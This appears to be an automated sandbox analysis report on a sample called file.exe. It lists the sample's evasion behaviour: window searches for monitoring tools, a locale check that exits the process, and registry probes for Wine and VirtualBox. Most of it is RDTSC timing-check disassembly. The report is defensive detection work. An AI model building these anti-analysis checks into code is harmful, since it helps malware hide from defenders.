Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_003D9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58250

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 621C12 second address: 621C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E853 second address: 79E85C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E9E1 second address: 79E9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E9E5 second address: 79E9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E9F1 second address: 79EA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDC4h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EA0A second address: 79EA27 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F07811116D8h 0x00000008 pushad 0x00000009 jmp 00007F07811116E0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EE8C second address: 79EE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EE90 second address: 79EE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F188 second address: 79F1CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0780D1BDC2h 0x00000008 jmp 00007F0780D1BDC4h 0x0000000d jmp 00007F0780D1BDC4h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F1CF second address: 79F1D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F1D9 second address: 79F1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F1DD second address: 79F1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F1E1 second address: 79F1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A188D second address: 7A18F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F07811116D8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push esi 0x00000029 jl 00007F07811116D9h 0x0000002f movzx edi, cx 0x00000032 pop edi 0x00000033 push esi 0x00000034 sub ecx, dword ptr [ebp+122D3954h] 0x0000003a pop edx 0x0000003b push B6D4F401h 0x00000040 pushad 0x00000041 pushad 0x00000042 je 00007F07811116D6h 0x00000048 push edx 0x00000049 pop edx 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A18F3 second address: 7A18F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1A34 second address: 7A1A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1A38 second address: 7A1A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1A3C second address: 7A1AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F07811116DBh 0x0000000c nop 0x0000000d jmp 00007F07811116E7h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F07811116D8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push CE7EF980h 0x00000033 push eax 0x00000034 push edx 0x00000035 jl 00007F07811116E0h 0x0000003b jmp 00007F07811116DAh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B492E second address: 7B4943 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0780D1BDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007F0780D1BDBCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2E86 second address: 7C2EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F07811116D6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F07811116E7h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2EAD second address: 7C2EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2EB3 second address: 7C2ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jng 00007F07811116F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F07811116E2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2ED5 second address: 7C2ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78817D second address: 788182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0E68 second address: 7C0E72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0780D1BDB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0E72 second address: 7C0E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0E7C second address: 7C0E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0780D1BDB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C126B second address: 7C1275 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1275 second address: 7C127F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0780D1BDB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C13DB second address: 7C13ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F07811116DDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C13ED second address: 7C13FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F0780D1BDBEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1799 second address: 7C179D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1A5F second address: 7C1A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1A67 second address: 7C1A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2003 second address: 7C2014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C28AC second address: 7C28D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jbe 00007F07811116D6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F07811116D6h 0x0000001c jmp 00007F07811116E0h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C28D8 second address: 7C28E7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0780D1BDB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4E84 second address: 7C4E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4E92 second address: 7C4E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4E96 second address: 7C4EA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C539A second address: 7C539F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C874E second address: 7C8754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C8754 second address: 7C8760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0780D1BDB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CDD48 second address: 7CDD76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jbe 00007F07811116D6h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F07811116E4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD319 second address: 7CD324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD324 second address: 7CD32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD32A second address: 7CD35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDBFh 0x00000009 popad 0x0000000a jnc 00007F0780D1BDC9h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD35A second address: 7CD362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD362 second address: 7CD368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD4BC second address: 7CD4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD4C2 second address: 7CD4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD4C6 second address: 7CD4CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD64B second address: 7CD650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD650 second address: 7CD656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD656 second address: 7CD65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD93D second address: 7CD945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD945 second address: 7CD959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD959 second address: 7CD95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD95D second address: 7CD978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD978 second address: 7CD97D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CDAF0 second address: 7CDAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CDAF8 second address: 7CDAFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CED4A second address: 7CED5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F0780D1BDB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CED5D second address: 7CED71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CED71 second address: 7CED77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF0D5 second address: 7CF0DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF0DB second address: 7CF0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFBB8 second address: 7CFBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFBBC second address: 7CFBC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFBC5 second address: 7CFBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jg 00007F07811116D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFCD4 second address: 7CFCD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFDDA second address: 7CFDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07811116DCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D019C second address: 7D0222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c jnl 00007F0780D1BDBCh 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F0780D1BDB8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e jmp 00007F0780D1BDC3h 0x00000033 call 00007F0780D1BDBEh 0x00000038 pushad 0x00000039 sub ecx, dword ptr [ebp+122D3AD4h] 0x0000003f mov dword ptr [ebp+122D3459h], edi 0x00000045 popad 0x00000046 pop edi 0x00000047 xchg eax, ebx 0x00000048 jmp 00007F0780D1BDC2h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 js 00007F0780D1BDBCh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D0222 second address: 7D0226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20AB second address: 7D20B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20B1 second address: 7D20E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F07811116E9h 0x0000000d jmp 00007F07811116DEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20E0 second address: 7D20E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20E8 second address: 7D20F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F07811116D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20F4 second address: 7D20F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20F8 second address: 7D2114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 793AC0 second address: 793AD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDBFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F0780D1BDB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D28CC second address: 7D28DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D28DB second address: 7D28E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D28E1 second address: 7D28E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D3A5F second address: 7D3A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D4579 second address: 7D45F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 movsx edi, di 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F07811116D8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007F07811116E6h 0x0000002d pop esi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F07811116D8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a push ecx 0x0000004b clc 0x0000004c pop esi 0x0000004d jbe 00007F07811116DCh 0x00000053 mov dword ptr [ebp+122D247Ch], ebx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D45F4 second address: 7D45FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
